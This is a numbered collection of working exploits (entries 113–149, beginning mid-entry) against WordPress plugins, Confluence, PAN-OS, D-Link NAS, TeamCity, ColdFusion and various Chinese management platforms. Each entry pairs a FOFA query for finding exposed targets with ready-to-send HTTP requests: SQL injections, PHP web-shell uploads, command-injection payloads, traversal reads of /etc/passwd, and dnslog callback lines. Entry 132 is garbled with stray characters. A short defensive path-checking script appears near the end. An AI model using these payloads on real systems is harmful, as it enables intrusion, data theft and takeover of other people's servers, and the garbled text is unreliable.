{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 - 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account and password are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


File path: /upload/2.php


121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA: title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

Uploaded file path: boot/web/upload/weblogo/1.php

122. 北京百绰智能 S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA: title="Smart管理平台"
The sql parameter carries the SQL statement base64-encoded (not encrypted): sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
CVE-2023-22527
FOFA: app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The command output is returned in the X-Cmd-Response response header.

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA: body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

The written file is then reachable at http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA: icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console with it; from there system commands can be executed.

126. aiohttp path traversal
CVE-2024-23334
FOFA: title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Note: the traversal only works on aiohttp versions before 3.9.2 when the static route was registered with follow_symlinks=True; with the default (False) the request is refused. Send the request without letting the client normalise the path (for example curl --path-as-is), otherwise the dot segments are collapsed before they reach the server.

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA: body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

Replace the dnslog hostname with your own; a DNS or HTTP callback confirms that the parser resolves external entities.

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 Update 17 and earlier, 2021 Update 7 and earlier, 2023 Update 1 and earlier
FOFA: app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA: app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the server uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer-service system arbitrary file upload
FOFA: icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

Note: the part is declared as image/png but carries PHP; the handler trusts the declared type and the client's file name.

131. Mini-Tmall <= 20231017 SQL injection
FOFA: icon_hash="-2087517259"
Admin backend: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

! r4 K, g- ?2 M8 B4 X0 ^132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过* R5 L7 w7 h2 ~
CVE-2024-27198
! \: o0 x  g" O5 lFOFA:body="Log in to TeamCity"; t7 P7 _; K; A* d
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.16 b% Z: |- R+ B/ Q
Host: 192.168.40.130:8111
8 m5 D- ?1 z' J8 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; `; I: P# W; O& d
Accept: */*
2 k( P2 i0 @) w- }Content-Type: application/json
: r8 ]6 T5 N7 fAccept-Encoding: gzip, deflate
* F% V5 [8 _, m, q' _8 t5 n) O5 J$ O9 V$ v
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
3 @7 J$ V* K& D7 @/ G  G
! m  w- g" \0 o8 I+ `  @4 N9 K% H0 |& F
CVE-2024-27199
0 u/ ^' _8 t) G3 f/res/../admin/diagnostic.jsp
8 Q% R$ ?7 b# O6 E7 d. p/.well-known/acme-challenge/../../admin/diagnostic.jsp7 b2 w9 ^; u1 H3 _( k8 r. X
/update/../admin/diagnostic.jsp
+ ^% S! Y5 G. l: u$ l9 W* o' K+ L( n) c7 ^* u1 J' p' k

# q* h$ ?) `1 E( V0 \# ECVE-2024-27198-RCE.py
$ m0 F  `' h+ `3 ?4 I7 y, v$ }
133. H5 云商城 (H5 cloud mall) file.php arbitrary file upload
FOFA: body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--


134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA: app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA: app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA: title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立讯 communications command-and-dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communications command-and-dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Acc

139. 福建科立讯 communications command-and-dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communications command-and-dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯 command-and-dispatch management platform ajax_users.php SQL injection
FOFA: body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak default password
CVE-2024-29666
FOFA: body="/808gps/"
Default credentials: admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA: title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
CVE-2024-3272 (hard-coded account) / CVE-2024-3273 (command injection)
FOFA: app="D_Link-DNS-ShareCenter"
The user/passwd pair is the built-in backdoor account (passwd YWJjMTIzNDVjYmE is base64 for abc12345cba); the system parameter carries the command to execute, base64-encoded (aWQ= is id).
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA: icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog-address>`;
Accept-Encoding: gzip

Note: the SESSID value is used unsanitised as a file path, so the request creates an empty file in the device-telemetry directory; the telemetry job later passes that file name to a shell, which is what turns the traversal into command execution. A callback to the dnslog address confirms the injection.

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175 / CVE-2023-50917
FOFA: app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

url=cnRzcDovL2EK is base64 for rtsp://a; transport URL-decodes to || (echo '[S]'; id; echo '[E]')#; and the command output appears between the [S] and [E] markers in the response.

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA: body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

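Entries 126, 129, 132 (CVE-2024-27199) and 147 are all the same defect: a file-serving endpoint joins client input to a base directory and never checks where the joined path ends up. The check below is an added example, not code from aiohttp, Adobe ColdFusion, TeamCity or RaidenMAILD; the document root and the files in it are constructed in a temporary directory, and the function assumes the caller has already percent-decoded the requested path.

```python
import os
import tempfile
from typing import Dict, Optional


def resolve_under_root(root: str, requested: str, follow_symlinks: bool = False) -> Optional[str]:
    """Map a client-supplied path onto the filesystem and return it only if,
    after full resolution, it still lies under `root`; otherwise return None.

    The containment check is unconditional: allowing symlinks must not switch
    it off, which is the mistake behind the aiohttp traversal above.
    """
    root_real = os.path.realpath(root)
    # Strip leading slashes so an absolute path cannot replace the root in join().
    candidate = os.path.normpath(os.path.join(root_real, requested.lstrip("/")))
    resolved = os.path.realpath(candidate)
    if not follow_symlinks and resolved != candidate:
        return None  # some component is a symlink; refuse rather than follow it
    try:
        inside = os.path.commonpath([root_real, resolved]) == root_real
    except ValueError:  # paths on different drives (Windows)
        inside = False
    return resolved if inside else None


def demo() -> Dict[str, Optional[str]]:
    """Run the checks the PoCs above depend on against a throwaway document root."""
    results: Dict[str, Optional[str]] = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "www")
        outside = os.path.join(tmp, "secret")  # stands in for /etc
        os.makedirs(os.path.join(root, "static"))
        os.makedirs(outside)
        with open(os.path.join(root, "static", "app.js"), "w", encoding="utf-8") as fh:
            fh.write("// constructed sample asset\n")
        with open(os.path.join(outside, "passwd"), "w", encoding="utf-8") as fh:
            fh.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed sample line

        results["normal"] = resolve_under_root(root, "static/app.js")
        # The aiohttp / RaidenMAILD / ColdFusion shape: climb out with dot segments.
        results["traversal"] = resolve_under_root(root, "static/../../../../../etc/passwd")
        # An absolute path is re-rooted under `root`, not honoured as given.
        results["absolute"] = resolve_under_root(root, "/etc/passwd")
        try:
            os.symlink(outside, os.path.join(root, "static", "link"))
            os.symlink(os.path.join(root, "static"), os.path.join(root, "assets"))
        except OSError:
            return results  # platform refuses symlinks; skip that part of the demo
        # Symlink pointing outside: refused when symlinks are off, and still
        # caught by the containment check when they are on.
        results["symlink_refused"] = resolve_under_root(root, "static/link/passwd")
        results["symlink_escape_blocked"] = resolve_under_root(root, "static/link/passwd", follow_symlinks=True)
        # Symlink that stays inside the root is fine when following is allowed.
        results["symlink_inside_root"] = resolve_under_root(root, "assets/app.js", follow_symlinks=True)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:24} -> {value}")
```

Percent-decoding has to happen before this function is called, otherwise `%2e%2e` survives the normalisation and is decoded later by something else; and a request like the one in 126 only reaches the server with its dot segments intact if the client does not normalise them first.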
148. CrushFTP authentication bypass / server-side template injection
CVE-2024-4040
FOFA: body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA: title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
